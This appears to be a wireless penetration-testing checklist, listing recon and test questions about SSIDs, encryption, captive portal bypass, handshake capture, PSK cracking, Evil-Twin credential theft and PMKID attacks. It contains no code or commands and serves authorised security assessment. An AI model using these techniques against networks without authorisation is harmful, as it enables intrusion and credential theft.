During the recon phase, here are listed some questions that you might ask yourself.
What are the SSIDs in scope?
What kind of wireless protocol is it (WEP, WPA, WPA2, WPA3)?
What is the network scheme (Personal vs Enterprise)?
Is there any open networks?
Is there any hidden networks?
Identify the access point manufacturer.
Identify the guest and corporate network.
Identify the method of authentication (using PSK, EAP-PEAP, etc?)
Check for any captive portal.
Is there any clients connected? If yes, on what channels are they?
Is the Wi-Fi Protected Setup (WPS) enabled on WPA/WPA2-PSK networks?
Is there any filter that prevent any devices to connect to the network (i.e. mac filtering)?
Can you bypass the captive portal (DNS tunneling, MAC spoofing)?
Test for network segmentation. When connected to the guest network, can you join assets in the corporate network?
Test for network isolation. When connected to the guest network, can you join others assets in the same subnet?
Can you capture 4-way handshakes?
Test the robustness of the keys. Can you crack the PSK keys?
Is there any known vulnerabilities associated to the SOHO router?
Can you retrieve Active Directory credentials with an Evil-Twin attack?
In a WPA-Enterprise network, test for certificate validation client and server side.
Password spray
Have you verify any egress traffic restriction?
Is the same public IP address are shared between the corporate and guest wireless network?
Are the WPA/WPA2-PSK networks are vulnerable to the PMKID attack?
Can you collect usernames by capturing the EAP frames?
Last updated 1 year ago